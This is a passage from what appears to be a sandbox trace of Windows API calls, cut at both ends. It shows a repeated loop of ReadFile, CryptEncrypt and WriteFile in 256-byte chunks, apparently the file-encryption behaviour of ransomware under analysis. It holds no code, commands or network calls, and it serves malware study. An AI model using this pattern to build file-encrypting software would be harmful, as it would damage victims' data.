hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.541] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.541] GetLastError () returned 0x0 [0170.541] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.541] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.541] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.541] GetLastError () returned 0x0 [0170.541] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.541] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.541] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.541] GetLastError () returned 0x0 [0170.541] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.541] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.541] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.541] GetLastError () returned 0x0 [0170.541] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.541] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.542] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.542] GetLastError () returned 0x0 [0170.542] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.542] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.542] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.542] GetLastError () returned 0x0 [0170.542] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.542] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.542] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.542] GetLastError () returned 0x0 [0170.542] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.542] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.542] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.542] GetLastError () returned 0x0 [0170.542] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.542] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.542] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.542] GetLastError () returned 0x0 [0170.542] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.543] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.543] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.543] GetLastError () returned 0x0 [0170.543] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.543] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.543] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.543] GetLastError () returned 0x0 [0170.543] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.543] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.543] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.543] GetLastError () returned 0x0 [0170.543] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.543] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.543] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.543] GetLastError () returned 0x0 [0170.543] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.543] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.543] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.543] GetLastError () returned 0x0 [0170.544] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.544] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.544] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.544] GetLastError () returned 0x0 [0170.544] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.544] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.544] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.544] GetLastError () returned 0x0 [0170.544] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.545] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.545] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.545] GetLastError () returned 0x0 [0170.545] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.545] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.546] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.546] GetLastError () returned 0x0 [0170.546] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.546] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.546] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.546] GetLastError () returned 0x0 [0170.546] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.546] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.546] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.546] GetLastError () returned 0x0 [0170.546] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.546] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.546] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.546] GetLastError () returned 0x0 [0170.546] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.546] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.546] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.546] GetLastError () returned 0x0 [0170.546] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.546] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.547] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.547] GetLastError () returned 0x0 [0170.547] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.547] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.547] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.547] GetLastError () returned 0x0 [0170.547] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.547] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.547] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.547] GetLastError () returned 0x0 [0170.547] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.547] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.547] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.547] GetLastError () returned 0x0 [0170.547] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.547] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.547] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.547] GetLastError () returned 0x0 [0170.547] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.548] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.548] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.548] GetLastError () returned 0x0 [0170.548] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.548] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.548] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.548] GetLastError () returned 0x0 [0170.548] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.548] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.548] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.548] GetLastError () returned 0x0 [0170.548] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.548] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.548] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.548] GetLastError () returned 0x0 [0170.548] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7effc*=0x100, lpOverlapped=0x0) returned 1 [0170.548] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7f000, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7f000*=0x100, lpOverlapped=0x0) returned 1 [0170.549] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7efe8*=0x100) returned 1 [0170.549] GetLastError () returned 0x0 [0170.549] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7effc, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, 